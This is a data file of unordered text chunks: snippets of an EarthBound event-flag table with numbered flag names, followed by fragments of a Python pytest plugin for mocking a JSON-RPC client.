(Multipurpose?) 524: 'YOUR_SANCTUARY_MUSIC', # 525", "#457 and #459 774: 'TALKED_TO_MOONSIDE_SAILOR_MAN', # 775 (Can't get calls from Dad?) 776:", "Building) -- Got kicked out of Pokey's Room in the Monotoli Building? 626:", "405: 'GUARDIAN_HIEROGLYPH_16_DEFEATED', 406: 'GUARDIAN_HIEROGLYPH_17_DEFEATED', 407: 'LETHAL_ASP_HIEROGLYPH_1_DEFEATED', 408: 'LETHAL_ASP_HIEROGLYPH_2_DEFEATED', 409: 'LETHAL_ASP_HIEROGLYPH_3_DEFEATED', 410: 'LETHAL_ASP_HIEROGLYPH_4_DEFEATED', 411:", "364: 'SHARK_OUTSIDE_ARCADE_2_DEFEATED', 365: 'SHARK_AT_ARCADE_ABSENT', 366: 'SLIMY_LITTLE_PILE_1_DEFEATED_AND_THREED_BLOND_GUY_BY_TENT_ABSENT', 367: 'SLIMY_LITTLE_PILE_2_DEFEATED', 368: 'SLIMY_LITTLE_PILE_3_DEFEATED', 369: 'CAN_ENTER_BELCHS_FACTORY', #", "book\"? This flag is set even if you don't talk to Apple Kid", "310: 'POKEY_WAITING_AT_COUCH', 311: 'WINTERS_ROPE_LOWERED', 312: 'GHOSTS_BLOCKING_THREED', # 313 (Unknown. Something about the City", "'NESS_HOUSE_POKEY_MUSIC', 98: 'ANSWERED_DADS_CALL', 99: 'BOUGHT_SCAM_HOUSE', 100: 'KING_WONT_JOIN', 101: 'LEARNED_THAT_LIER_SOLD_THE_MANI_MANI', 102: 'TALKED_TO_SHYGUY_ABOUT_SHYNESS_BOOK', 103: 'LIBRARY_BATHROOM_MAN',", "'ENEMY_SUPPRESS', 12: 'PAULAS_PARENTS_KNOW_ABOUT_HH_RESCUE', 13: 'PAULA_JOINS', 14: 'JEFF_JOINS', 15: 'MONSTERS_IN_WINTERS', 16: 'POO_JOINS', 17: 'POO_LEARNING_STARSTORM',", "# First hotel room 297: 'ZOMBIE_CHICK_AT_HOTEL_2', # Second hotel room 298: 'ZOMBIE_CHICK_AT_HOTEL_3', #", "talk to Tracy after defeating Giygas, but never set) 770: 'LAST_ESCARGO_EXPRESS_CALL', # 771", "'SHOP_SOLD_ITEM', # 226 (I hate multipurpose flags) # 227 (I hate multipurpose flags)", "648: 'FOR_SALE_SIGN_CUSTOMER_4', 649: 'TALKED_TO_ROCK_BELOW_TENDA_VILALGE', 650: 'GOT_MONKEYS_LOVE', 651: 'UNDERWORLD_TENDA_GATE_OPEN', 652: 'USED_CARROT_KEY', 653: 'SHOP_DEEP_DARKNESS_ARMS_DEALER', 654:", "152: 'PYRAMID_DANCE_IN_PROGRESS', 153: 'TENDA_VILLAGE_UNDERGROUND_OPEN', 154: 'TALKED_TO_TENDA_CHIEF', 155: 'TENDAS_NOT_SHY', # 156 (???) # 157", "# TODO: CONFIRM 595: 'STAR_MASTER_NEXT_TO_MU', # 596 (???) 597: 'SHOP_SCARABA_BAZAAR_FOOD', 598: 'SHOP_SCARABA_WATER', 599:", "of expanded mine?) # 55 (Also related to Montague... AND STONEHENGE??) # 56", "718: 'GOT_PHOTO_POOS_PALACE_OUTSIDE', 719: 'GOT_PHOTO_STONEHENGE', 720: 'GOT_PHOTO_SUMMERS_HOTEL', 721: 'GOT_PHOTO_FOURSIDE_RESTAURANT', 722: 'GOT_PHOTO_SUMMERS_BEACH', 723: 'GOT_PHOTO_TOTO', 724:", "'SHOP_FOURSIDE_DEPT_3RD_FLOOR_CONSUMABLES', 258: 'SHOP_FOURSIDE_DEPT_BAKERY', 259: 'SHOP_FOURSIDE_DEPT_4TH_FLOOR_TOYS', 260: 'SHOP_FOURSIDE_DEPT_4TH_FLOOR_SPORTS', 261: 'SHOP_FOURSIDE_DEPT_BURGER', 262: 'SHOP_FOURSIDE_DEPT_CONDIMENTS', 263: 'SHOP_FOURSIDE_DEPT_ARMS_DEALER',", "'DUNGEON_MAN_AT_PALM_TREES', 275: 'LEARNED_TELEPORT', 276: 'MASTER_BARF_DEFEATED', 277: 'GUARDIAN_MOLE_1_DEFEATED', 278: 'GUARDIAN_MOLE_2_DEFEATED', 279: 'GUARDIAN_MOLE_3_DEFEATED', 280: 'GUARDIAN_MOLE_4_DEFEATED',", "'POO_STARTS_HIS_JOURNEY', # 150 (Related to Poo's journey) 151: 'QUEST_TO_SUBMARINE', 152: 'PYRAMID_DANCE_IN_PROGRESS', 153: 'TENDA_VILLAGE_UNDERGROUND_OPEN',", "696: 'RANDOM_JEFF_ITEM_FIX_CHANCE', 697: 'SHARK_AT_ARCADE_UPSTAIRS_DEFEATED', 698: 'GOT_PHOTO_NESS_HOUSE', 699: 'GOT_PHOTO_SCAM_HOUSE', 700: 'GOT_PHOTO_CYCLE_SHOP', 701: 'GOT_PHOTO_PEACEFUL_REST_VALLEY', 702:", "703: 'GOT_PHOTO_CHAOS_THEATER', 704: 'GOT_PHOTO_LAKE_TESS', 705: 'GOT_PHOTO_BRICK_ROAD_DUNGEON', 706: 'GOT_PHOTO_THREED_CEMETERY', 707: 'GOT_PHOTO_GRAPEFRUIT_FALLS', 708: 'GOT_PHOTO_SATURN_VALLEY_COFFEE', 709:", "499: 'PHOTO_POOS_PALACE_OUTSIDE_AVAILABLE', 500: 'PHOTO_STONEHENGE_AVAILABLE', 501: 'PHOTO_SUMMERS_HOTEL_AVAILABLE', 502: 'PHOTO_FOURSIDE_RESTAURANT_AVAILABLE', 503: 'PHOTO_SUMMERS_BEACH_AVAILABLE', 504: 'PHOTO_TOTO_AVAILABLE', 505:", "'GOT_LETTER_FROM_KIDS', 668: 'TALKED_TO_MONTAGUE_AT_SATURN_VALLEY_BEFORE_MAGICANT', 669: 'FLY_HONEY_TRASH_CAN_VISIBLE', 670: 'GOT_FOR_SALE_SIGN', # 671 (???) 672: 'POKEY_FLIES_AWAY_BY_HELICOPTER', 673:", "# 377 (???) # 378 (???) 379: 'ANDONUTS_AT_LAB_ABSENT', # 380 (???) # 381", "City Bus?) # 314 (Unknown. Something about the Runaway Five Bus?) 315: 'GHOSTS_BLOCKING_TWOSON',", "487: 'PHOTO_THREED_CEMETERY_AVAILABLE', 488: 'PHOTO_GRAPEFRUIT_FALLS_AVAILABLE', 489: 'PHOTO_SATURN_VALLEY_COFFEE_AVAILABLE', 490: 'PHOTO_CIRCUS_TENT_AVAILABLE', 491: 'PHOTO_BLACK_SESAME_SEED_AVAILABLE', 492: 'PHOTO_DESERT_MINE_AVAILABLE', 493:", "'HH_HQ_CULTIST_3_DEFEATED', 354: 'HH_HQ_CULTIST_4_DEFEATED', 355: 'HH_HQ_CULTIST_5_DEFEATED', 356: 'HH_HQ_CULTIST_6_DEFEATED', 357: 'SENTRY_ROBOT_1_DEFEATED', 358: 'SENTRY_ROBOT_2_DEFEATED', 359: 'SENTRY_ROBOT_3_DEFEATED',", "'TRACY_DOWNSTAIRS', 532: 'NESS_ROOM_METEORITE_FALLING_MUSIC', 533: 'NESS_ROOM_METEORITE_CRASH_MUSIC', 534: 'CITY_BUS_MUSIC', 535: 'RUNAWAY_BUS_OR_SKY_RUNNER_FALLING_MUSIC', 536: 'RUNAWAY_FIVE_FREE_MUSIC', 537: 'TESSIE_MUSIC',", "59: 'ELECTRA_OUTSIDE_BUILDING', 60: 'EVERDRED_OUTSIDE_CAFE', 61: 'MAGIC_CAKE_LADY_IDENTIFIED', 62: 'DUNGEON_MAN_IN_DESERT', 63: 'PATH_TO_MANI_MANI_OPEN', 64: 'FRANKYSTEIN_MKII_DEFEATED', #", "108: 'ENTERTAINERS_SHACK_UNLOCKED', 109: 'ONETT_COP_DIALOGUE', # 110 (???) 111: 'VISITED_PEACEFUL_REST_PENCIL', 112: 'INVESTED_IN_APPLE_KID', 113: 'STUBBY_LEGS',", "19: 'SLEEPING_KING_ABSENT', 20: 'PICKY_IN_PARTY', 21: 'POKEY_IN_PARTY', 22: 'BUBBLE_MONKEY_IN_PARTY', 23: 'TONY_JOINS', 24: 'DUNGEON_MAN_JOINS', 25:" ]
[ "self._calls.clear() def start(self): \"\"\" Activates a patcher. \"\"\" patcher = self._mocker.patch(self._target) with patcher:", "**kwargs: None, name=f'{endpoint}:{version}:{method_name}'), ) if isinstance(params, (list, tuple)): stub(*params) else: stub(**params) if match.callback:", "def _on_request(self, origin_self: Any, request_text: str, is_notification: bool = False, **kwargs: Any): endpoint", "-> None: \"\"\" Stop an active patcher. \"\"\" self.reset() self._patcher.stop() def _cleanup_matches(self, endpoint:", "str = '2.0'): \"\"\" Removes a previously added response patch. :param endpoint: request", "patched request version :param once: if ``True`` the patch will be deleted after", "shortcuts PjRpcRequestsMocker = ft.partial(PjRpcMocker, target='xjsonrpc.client.backend.requests.Client._request') PjRpcAiohttpMocker = ft.partial(PjRpcMocker, target='xjsonrpc.client.backend.aiohttp.Client._request') @pytest.fixture def xjsonrpc_requests_mocker(): \"\"\"", "Response: matches = self._matches[endpoint].get((version, method_name)) if matches is None: return xjsonrpc.Response(id=id, error=xjsonrpc.exc.MethodNotFoundError(data=method_name)) match", "(list, tuple)): result = match.callback(*params) else: result = match.callback(**params) return xjsonrpc.Response(id=id, result=result) else:", "def xjsonrpc_aiohttp_mocker(): \"\"\" Aiohttp client mocking fixture. \"\"\" with PjRpcAiohttpMocker() as mocker: yield", "return result def reset(self) -> None: \"\"\" Removes all added matches and reset", "patch will be deleted after the first call :param callback: patched request callback", "result=result, error=error, callback=callback) self._matches[endpoint][(version, method_name)].append(match) def replace( self, endpoint: str, method_name: str, result:", "str]] = None, version: str = '2.0', once: bool = False, callback: Optional[Callable]", "version, method_name) return result def reset(self) -> None: \"\"\" Removes all added matches", "an active patcher. \"\"\" self.reset() self._patcher.stop() def _cleanup_matches(self, endpoint: str, version: str =", "self._patcher = None self._async_resp = False self._passthrough = passthrough self._matches: Dict = collections.defaultdict(lambda:", "id: Optional[Union[int, str]], ) -> Response: matches = self._matches[endpoint].get((version, method_name)) if matches is", "UNSET, UnsetType class Match: \"\"\" Match object. Incorporates request matching information. \"\"\" def", "= mocker self._patcher = None self._async_resp = False self._passthrough = passthrough self._matches: Dict", "client mocking fixture. \"\"\" with PjRpcRequestsMocker() as mocker: yield mocker @pytest.fixture def xjsonrpc_aiohttp_mocker():", "match.callback(*params) else: result = match.callback(**params) return xjsonrpc.Response(id=id, result=result) else: return xjsonrpc.Response( id=id or", ") -> None: \"\"\" Appends response patch. If the same method patch already", "deleted after the first call :param callback: patched request callback \"\"\" match =", "error=match.response_data['error'], ) def __enter__(self): self.start() return self def __exit__(self, exc_type, exc_val, exc_tb): self.stop()", "JSON-PRC method calls. \"\"\" return self._calls def add( self, endpoint: str, method_name: str,", "self._match_request(endpoint, request.version, request.method, request.params, request.id) if self._async_resp: async def wrapper(): return json.dumps(response.to_json()) return", "json import unittest.mock from typing import Any, Callable, Dict, Optional, Union import pytest", "= match def remove(self, endpoint: str, method_name: Optional[str] = None, version: str =", "pass not mocked requests to the original method \"\"\" def __init__(self, target, mocker=unittest.mock,", "once: if ``True`` the patch will be deleted after the first call :param", "(list, tuple)): response = xjsonrpc.BatchResponse() for request in xjsonrpc.BatchRequest.from_json(json_data): response.append( self._match_request(endpoint, request.version, request.method,", "than one) \"\"\" match = Match(endpoint, version, method_name, once, id=id, result=result, error=error, callback=callback)", "in xjsonrpc.BatchRequest.from_json(json_data): response.append( self._match_request(endpoint, request.version, request.method, request.params, request.id), ) else: request = xjsonrpc.Request.from_json(json_data)", "previously added response patch. :param endpoint: request endpoint :param method_name: method name :param", "= callback self.response_data = response_data class PjRpcMocker: \"\"\" Synchronous JSON-RPC client mocker. :param", "def wrapper(): return json.dumps(response.to_json()) return wrapper() else: return json.dumps(response.to_json()) def _match_request( self, endpoint:", "is None: result = self._matches.pop(endpoint) else: result = self._matches[endpoint].pop((version, method_name)) self._cleanup_matches(endpoint, version, method_name)", "Dict = collections.defaultdict(lambda: collections.defaultdict(list)) self._calls: Dict = collections.defaultdict(dict) @property def calls(self) -> Dict:", "mocking out ``xjsonrpc`` library clients. \"\"\" import asyncio import collections import functools as", "autospec=True) return self._patcher.start() def stop(self) -> None: \"\"\" Stop an active patcher. \"\"\"", "request.params, request.id) if self._async_resp: async def wrapper(): return json.dumps(response.to_json()) return wrapper() else: return", "Response from xjsonrpc.common import UNSET, UnsetType class Match: \"\"\" Match object. Incorporates request", "PjRpcAiohttpMocker = ft.partial(PjRpcMocker, target='xjsonrpc.client.backend.aiohttp.Client._request') @pytest.fixture def xjsonrpc_requests_mocker(): \"\"\" Requests client mocking fixture. \"\"\"", "replace( self, endpoint: str, method_name: str, result: UnsetType = UNSET, error: UnsetType =", "ft.partial(PjRpcMocker, target='xjsonrpc.client.backend.aiohttp.Client._request') @pytest.fixture def xjsonrpc_requests_mocker(): \"\"\" Requests client mocking fixture. \"\"\" with PjRpcRequestsMocker()", "once: bool = False, callback: Optional[Callable] = None, ) -> None: \"\"\" Appends", "Dict, Optional, Union import pytest import xjsonrpc from xjsonrpc import Response from xjsonrpc.common", "ConnectionRefusedError() json_data = json.loads(request_text) if isinstance(json_data, (list, tuple)): response = xjsonrpc.BatchResponse() for request", ":param endpoint: request endpoint :param method_name: method name :param version: JSON-RPC request version", "self._calls.values(): for stub in calls.values(): stub.reset_mock() self._calls.clear() def start(self): \"\"\" Activates a patcher.", "of JSON-PRC method calls. \"\"\" return self._calls def add( self, endpoint: str, method_name:", "matches = self._matches[endpoint].get((version, method_name)) if not matches: self._matches[endpoint].pop((version, method_name), None) if not self._matches[endpoint]:", "matches = self._matches.get(endpoint) if matches is None: if self._passthrough: return self._patcher.temp_original(origin_self, request_text, is_notification,", "origin_self._endpoint matches = self._matches.get(endpoint) if matches is None: if self._passthrough: return self._patcher.temp_original(origin_self, request_text,", "method_name)) if not matches: self._matches[endpoint].pop((version, method_name), None) if not self._matches[endpoint]: self._matches.pop(endpoint) def _on_request(self,", "import UNSET, UnsetType class Match: \"\"\" Match object. Incorporates request matching information. \"\"\"", "int = 0, ): \"\"\" Replaces a previously added response patch by a", "str, is_notification: bool = False, **kwargs: Any): endpoint = origin_self._endpoint matches = self._matches.get(endpoint)", "a patcher. \"\"\" patcher = self._mocker.patch(self._target) with patcher: if asyncio.iscoroutinefunction(patcher.temp_original): self._async_resp = True", ":param version: JSON-RPC request version :returns: removed response patch \"\"\" if method_name is", "= collections.defaultdict(dict) @property def calls(self) -> Dict: \"\"\" Dictionary of JSON-PRC method calls.", "all added matches and reset call statistics. \"\"\" self._matches.clear() for calls in self._calls.values():", "xjsonrpc.Response(id=id, error=xjsonrpc.exc.MethodNotFoundError(data=method_name)) match = matches.pop(0) if not match.once: matches.append(match) self._cleanup_matches(endpoint, version, method_name) stub", "**kwargs): return self._on_request(*args, **kwargs) self._patcher = self._mocker.patch(self._target, side_effect=side_effect, autospec=True) return self._patcher.start() def stop(self)", "Optional[Union[int, str]] = None, version: str = '2.0', once: bool = False, callback:", "be deleted after the first call :param callback: patched request callback \"\"\" match", "match = Match(endpoint, version, method_name, once, id=id, result=result, error=error, callback=callback) self._matches[endpoint][(version, method_name)].append(match) def", "with patcher: if asyncio.iscoroutinefunction(patcher.temp_original): self._async_resp = True if self._async_resp: async def side_effect(*args, **kwargs):", "str, version: str, method_name: str, once: bool, callback: Optional[Callable], **response_data: Any, ): self.endpoint", "typing import Any, Callable, Dict, Optional, Union import pytest import xjsonrpc from xjsonrpc", "be deleted after the first call :param callback: patched request callback :param idx:", "(if there are more than one) \"\"\" match = Match(endpoint, version, method_name, once,", "stub in calls.values(): stub.reset_mock() self._calls.clear() def start(self): \"\"\" Activates a patcher. \"\"\" patcher", "and reset call statistics. \"\"\" self._matches.clear() for calls in self._calls.values(): for stub in", "= self._mocker.patch(self._target) with patcher: if asyncio.iscoroutinefunction(patcher.temp_original): self._async_resp = True if self._async_resp: async def", "**kwargs) else: def side_effect(*args, **kwargs): return self._on_request(*args, **kwargs) self._patcher = self._mocker.patch(self._target, side_effect=side_effect, autospec=True)", "`pytest <https://docs.pytest.org/en/latest/>`_ client library integration. Implements some utilities for mocking out ``xjsonrpc`` library", "integration. Implements some utilities for mocking out ``xjsonrpc`` library clients. \"\"\" import asyncio", "the original method \"\"\" def __init__(self, target, mocker=unittest.mock, passthrough: bool = False): self._target", ":param endpoint: request endpoint :param method_name: method name :param result: patched result :param", "= None, version: str = '2.0', once: bool = False, callback: Optional[Callable] =", "= self._matches.pop(endpoint) else: result = self._matches[endpoint].pop((version, method_name)) self._cleanup_matches(endpoint, version, method_name) return result def", "callback \"\"\" match = Match(endpoint, version, method_name, once, id=id, result=result, error=error, callback=callback) self._matches[endpoint][(version,", "self, endpoint: str, version: str, method_name: str, params: Optional[Union[list, dict]], id: Optional[Union[int, str]],", "return xjsonrpc.Response(id=id, error=xjsonrpc.exc.MethodNotFoundError(data=method_name)) match = matches.pop(0) if not match.once: matches.append(match) self._cleanup_matches(endpoint, version, method_name)", "else: result = match.callback(**params) return xjsonrpc.Response(id=id, result=result) else: return xjsonrpc.Response( id=id or match.response_data['id'],", "return json.dumps(response.to_json()) def _match_request( self, endpoint: str, version: str, method_name: str, params: Optional[Union[list,", ":param id: patched request id :param version: patched request version :param once: if", "Replaces a previously added response patch by a new one. :param endpoint: request", "UnsetType = UNSET, id: Optional[Union[int, str]] = None, version: str = '2.0', once:", "= None) -> None: matches = self._matches[endpoint].get((version, method_name)) if not matches: self._matches[endpoint].pop((version, method_name),", "\"\"\" self._matches.clear() for calls in self._calls.values(): for stub in calls.values(): stub.reset_mock() self._calls.clear() def", "matches and reset call statistics. \"\"\" self._matches.clear() for calls in self._calls.values(): for stub", "in calls.values(): stub.reset_mock() self._calls.clear() def start(self): \"\"\" Activates a patcher. \"\"\" patcher =", "PjRpcRequestsMocker() as mocker: yield mocker @pytest.fixture def xjsonrpc_aiohttp_mocker(): \"\"\" Aiohttp client mocking fixture.", ") else: request = xjsonrpc.Request.from_json(json_data) response = self._match_request(endpoint, request.version, request.method, request.params, request.id) if", "'2.0', method_name: Optional[str] = None) -> None: matches = self._matches[endpoint].get((version, method_name)) if not", "stub.reset_mock() self._calls.clear() def start(self): \"\"\" Activates a patcher. \"\"\" patcher = self._mocker.patch(self._target) with", "method calls. \"\"\" return self._calls def add( self, endpoint: str, method_name: str, result:", "version :param once: if ``True`` the patch will be deleted after the first", "raise ConnectionRefusedError() json_data = json.loads(request_text) if isinstance(json_data, (list, tuple)): response = xjsonrpc.BatchResponse() for", "method_name), None) if not self._matches[endpoint]: self._matches.pop(endpoint) def _on_request(self, origin_self: Any, request_text: str, is_notification:", "error=xjsonrpc.exc.MethodNotFoundError(data=method_name)) match = matches.pop(0) if not match.once: matches.append(match) self._cleanup_matches(endpoint, version, method_name) stub =", "patcher. \"\"\" patcher = self._mocker.patch(self._target) with patcher: if asyncio.iscoroutinefunction(patcher.temp_original): self._async_resp = True if", "endpoint :param method_name: method name :param version: JSON-RPC request version :returns: removed response", "= None, ) -> None: \"\"\" Appends response patch. If the same method", "str = '2.0', once: bool = False, callback: Optional[Callable] = None, idx: int", "request.id) if self._async_resp: async def wrapper(): return json.dumps(response.to_json()) return wrapper() else: return json.dumps(response.to_json())", "\"\"\" Dictionary of JSON-PRC method calls. \"\"\" return self._calls def add( self, endpoint:", "self._calls def add( self, endpoint: str, method_name: str, result: UnsetType = UNSET, error:", "result: UnsetType = UNSET, error: UnsetType = UNSET, id: Optional[Union[int, str]] = None,", "\"\"\" Appends response patch. If the same method patch already exists they will", "= False, callback: Optional[Callable] = None, idx: int = 0, ): \"\"\" Replaces", "mocking fixture. \"\"\" with PjRpcRequestsMocker() as mocker: yield mocker @pytest.fixture def xjsonrpc_aiohttp_mocker(): \"\"\"", "is_notification: bool = False, **kwargs: Any): endpoint = origin_self._endpoint matches = self._matches.get(endpoint) if", "request.method, request.params, request.id), ) else: request = xjsonrpc.Request.from_json(json_data) response = self._match_request(endpoint, request.version, request.method,", "self._patcher.start() def stop(self) -> None: \"\"\" Stop an active patcher. \"\"\" self.reset() self._patcher.stop()", "requests to the original method \"\"\" def __init__(self, target, mocker=unittest.mock, passthrough: bool =", "return self def __exit__(self, exc_type, exc_val, exc_tb): self.stop() self.reset() # shortcuts PjRpcRequestsMocker =", "= self._matches.get(endpoint) if matches is None: if self._passthrough: return self._patcher.temp_original(origin_self, request_text, is_notification, **kwargs)", "def __init__( self, endpoint: str, version: str, method_name: str, once: bool, callback: Optional[Callable],", "def calls(self) -> Dict: \"\"\" Dictionary of JSON-PRC method calls. \"\"\" return self._calls", "target='xjsonrpc.client.backend.requests.Client._request') PjRpcAiohttpMocker = ft.partial(PjRpcMocker, target='xjsonrpc.client.backend.aiohttp.Client._request') @pytest.fixture def xjsonrpc_requests_mocker(): \"\"\" Requests client mocking fixture.", "one. :param endpoint: request endpoint :param method_name: method name :param result: patched result", "str, once: bool, callback: Optional[Callable], **response_data: Any, ): self.endpoint = endpoint self.version =", "once: bool, callback: Optional[Callable], **response_data: Any, ): self.endpoint = endpoint self.version = version", "Optional[str] = None, version: str = '2.0'): \"\"\" Removes a previously added response", "= collections.defaultdict(lambda: collections.defaultdict(list)) self._calls: Dict = collections.defaultdict(dict) @property def calls(self) -> Dict: \"\"\"", "Any, request_text: str, is_notification: bool = False, **kwargs: Any): endpoint = origin_self._endpoint matches", "None) -> None: matches = self._matches[endpoint].get((version, method_name)) if not matches: self._matches[endpoint].pop((version, method_name), None)", "\"\"\" match = Match(endpoint, version, method_name, once, id=id, result=result, error=error, callback=callback) self._matches[endpoint][(version, method_name)].append(match)", "response = self._match_request(endpoint, request.version, request.method, request.params, request.id) if self._async_resp: async def wrapper(): return", "= self.calls[endpoint].setdefault( (version, method_name), self._mocker.MagicMock(spec=lambda *args, **kwargs: None, name=f'{endpoint}:{version}:{method_name}'), ) if isinstance(params, (list,", "Optional, Union import pytest import xjsonrpc from xjsonrpc import Response from xjsonrpc.common import", "callback :param idx: patch index (if there are more than one) \"\"\" match", "response patch. :param endpoint: request endpoint :param method_name: method name :param version: JSON-RPC", "self.start() return self def __exit__(self, exc_type, exc_val, exc_tb): self.stop() self.reset() # shortcuts PjRpcRequestsMocker", "target, mocker=unittest.mock, passthrough: bool = False): self._target = target self._mocker = mocker self._patcher", "if self._async_resp: async def wrapper(): return json.dumps(response.to_json()) return wrapper() else: return json.dumps(response.to_json()) def", "import asyncio import collections import functools as ft import json import unittest.mock from", "False): self._target = target self._mocker = mocker self._patcher = None self._async_resp = False", "xjsonrpc import Response from xjsonrpc.common import UNSET, UnsetType class Match: \"\"\" Match object.", "str, method_name: str, once: bool, callback: Optional[Callable], **response_data: Any, ): self.endpoint = endpoint", "str, version: str = '2.0', method_name: Optional[str] = None) -> None: matches =", "def replace( self, endpoint: str, method_name: str, result: UnsetType = UNSET, error: UnsetType", "-> None: \"\"\" Appends response patch. If the same method patch already exists", "Requests client mocking fixture. \"\"\" with PjRpcRequestsMocker() as mocker: yield mocker @pytest.fixture def", "removed response patch \"\"\" if method_name is None: result = self._matches.pop(endpoint) else: result", "self._matches.get(endpoint) if matches is None: if self._passthrough: return self._patcher.temp_original(origin_self, request_text, is_notification, **kwargs) else:", "UnsetType = UNSET, error: UnsetType = UNSET, id: Optional[Union[int, str]] = None, version:", "= once self.callback = callback self.response_data = response_data class PjRpcMocker: \"\"\" Synchronous JSON-RPC", "self._mocker = mocker self._patcher = None self._async_resp = False self._passthrough = passthrough self._matches:", "the first call :param callback: patched request callback \"\"\" match = Match(endpoint, version,", "\"\"\" import asyncio import collections import functools as ft import json import unittest.mock", "Synchronous JSON-RPC client mocker. :param target: method to be mocked :param mocker: mocking", "version: str = '2.0', once: bool = False, callback: Optional[Callable] = None, idx:", "added response patch. :param endpoint: request endpoint :param method_name: method name :param version:", "patched error :param id: patched request id :param version: patched request version :param", "Optional[Callable] = None, idx: int = 0, ): \"\"\" Replaces a previously added", "self.calls[endpoint].setdefault( (version, method_name), self._mocker.MagicMock(spec=lambda *args, **kwargs: None, name=f'{endpoint}:{version}:{method_name}'), ) if isinstance(params, (list, tuple)):", "callback: patched request callback \"\"\" match = Match(endpoint, version, method_name, once, id=id, result=result,", "matches: self._matches[endpoint].pop((version, method_name), None) if not self._matches[endpoint]: self._matches.pop(endpoint) def _on_request(self, origin_self: Any, request_text:", "self._mocker.patch(self._target) with patcher: if asyncio.iscoroutinefunction(patcher.temp_original): self._async_resp = True if self._async_resp: async def side_effect(*args,", "endpoint: request endpoint :param method_name: method name :param result: patched result :param error:", "callback self.response_data = response_data class PjRpcMocker: \"\"\" Synchronous JSON-RPC client mocker. :param target:", "mocker self._patcher = None self._async_resp = False self._passthrough = passthrough self._matches: Dict =", "self.stop() self.reset() # shortcuts PjRpcRequestsMocker = ft.partial(PjRpcMocker, target='xjsonrpc.client.backend.requests.Client._request') PjRpcAiohttpMocker = ft.partial(PjRpcMocker, target='xjsonrpc.client.backend.aiohttp.Client._request') @pytest.fixture", "first call :param callback: patched request callback \"\"\" match = Match(endpoint, version, method_name,", "json.dumps(response.to_json()) return wrapper() else: return json.dumps(response.to_json()) def _match_request( self, endpoint: str, version: str,", "False, callback: Optional[Callable] = None, ) -> None: \"\"\" Appends response patch. If", "matches.append(match) self._cleanup_matches(endpoint, version, method_name) stub = self.calls[endpoint].setdefault( (version, method_name), self._mocker.MagicMock(spec=lambda *args, **kwargs: None,", "request_text, is_notification, **kwargs) else: raise ConnectionRefusedError() json_data = json.loads(request_text) if isinstance(json_data, (list, tuple)):", "endpoint: str, version: str, method_name: str, params: Optional[Union[list, dict]], id: Optional[Union[int, str]], )", "self.callback = callback self.response_data = response_data class PjRpcMocker: \"\"\" Synchronous JSON-RPC client mocker.", "Optional[Union[int, str]], ) -> Response: matches = self._matches[endpoint].get((version, method_name)) if matches is None:", "Removes all added matches and reset call statistics. \"\"\" self._matches.clear() for calls in", "``True`` the patch will be deleted after the first call :param callback: patched", "return await self._on_request(*args, **kwargs) else: def side_effect(*args, **kwargs): return self._on_request(*args, **kwargs) self._patcher =", ":param callback: patched request callback \"\"\" match = Match(endpoint, version, method_name, once, id=id,", "patch \"\"\" if method_name is None: result = self._matches.pop(endpoint) else: result = self._matches[endpoint].pop((version,", "error: patched error :param id: patched request id :param version: patched request version", "the patch will be deleted after the first call :param callback: patched request", "False self._passthrough = passthrough self._matches: Dict = collections.defaultdict(lambda: collections.defaultdict(list)) self._calls: Dict = collections.defaultdict(dict)", "\"\"\" Activates a patcher. \"\"\" patcher = self._mocker.patch(self._target) with patcher: if asyncio.iscoroutinefunction(patcher.temp_original): self._async_resp", "UNSET, id: Optional[Union[int, str]] = None, version: str = '2.0', once: bool =", "request endpoint :param method_name: method name :param result: patched result :param error: patched", "id=id, result=result, error=error, callback=callback) self._matches[endpoint][(version, method_name)].append(match) def replace( self, endpoint: str, method_name: str,", "method_name: str, result: UnsetType = UNSET, error: UnsetType = UNSET, id: Optional[Union[int, str]]", "previously added response patch by a new one. :param endpoint: request endpoint :param", "self.method_name = method_name self.once = once self.callback = callback self.response_data = response_data class", "= matches.pop(0) if not match.once: matches.append(match) self._cleanup_matches(endpoint, version, method_name) stub = self.calls[endpoint].setdefault( (version,", "\"\"\" Replaces a previously added response patch by a new one. :param endpoint:", "Activates a patcher. \"\"\" patcher = self._mocker.patch(self._target) with patcher: if asyncio.iscoroutinefunction(patcher.temp_original): self._async_resp =", "class Match: \"\"\" Match object. Incorporates request matching information. \"\"\" def __init__( self,", "_on_request(self, origin_self: Any, request_text: str, is_notification: bool = False, **kwargs: Any): endpoint =", "None: \"\"\" Stop an active patcher. \"\"\" self.reset() self._patcher.stop() def _cleanup_matches(self, endpoint: str,", "endpoint :param method_name: method name :param result: patched result :param error: patched error", "exc_type, exc_val, exc_tb): self.stop() self.reset() # shortcuts PjRpcRequestsMocker = ft.partial(PjRpcMocker, target='xjsonrpc.client.backend.requests.Client._request') PjRpcAiohttpMocker =", "patcher: if asyncio.iscoroutinefunction(patcher.temp_original): self._async_resp = True if self._async_resp: async def side_effect(*args, **kwargs): return", "exc_val, exc_tb): self.stop() self.reset() # shortcuts PjRpcRequestsMocker = ft.partial(PjRpcMocker, target='xjsonrpc.client.backend.requests.Client._request') PjRpcAiohttpMocker = ft.partial(PjRpcMocker,", "patch index (if there are more than one) \"\"\" match = Match(endpoint, version,", "\"\"\" return self._calls def add( self, endpoint: str, method_name: str, result: UnsetType =", ":param error: patched error :param id: patched request id :param version: patched request", "str, method_name: str, params: Optional[Union[list, dict]], id: Optional[Union[int, str]], ) -> Response: matches", "__exit__(self, exc_type, exc_val, exc_tb): self.stop() self.reset() # shortcuts PjRpcRequestsMocker = ft.partial(PjRpcMocker, target='xjsonrpc.client.backend.requests.Client._request') PjRpcAiohttpMocker", "result: patched result :param error: patched error :param id: patched request id :param", "added matches and reset call statistics. \"\"\" self._matches.clear() for calls in self._calls.values(): for", "str = '2.0', method_name: Optional[str] = None) -> None: matches = self._matches[endpoint].get((version, method_name))", "import json import unittest.mock from typing import Any, Callable, Dict, Optional, Union import", "mocker: yield mocker @pytest.fixture def xjsonrpc_aiohttp_mocker(): \"\"\" Aiohttp client mocking fixture. \"\"\" with", "str, method_name: str, result: UnsetType = UNSET, error: UnsetType = UNSET, id: Optional[Union[int,", "tuple)): stub(*params) else: stub(**params) if match.callback: if isinstance(params, (list, tuple)): result = match.callback(*params)", "collections import functools as ft import json import unittest.mock from typing import Any,", "self._matches[endpoint].pop((version, method_name), None) if not self._matches[endpoint]: self._matches.pop(endpoint) def _on_request(self, origin_self: Any, request_text: str,", "for mocking out ``xjsonrpc`` library clients. \"\"\" import asyncio import collections import functools", "UNSET, error: UnsetType = UNSET, id: Optional[Union[int, str]] = None, version: str =", "result def reset(self) -> None: \"\"\" Removes all added matches and reset call", 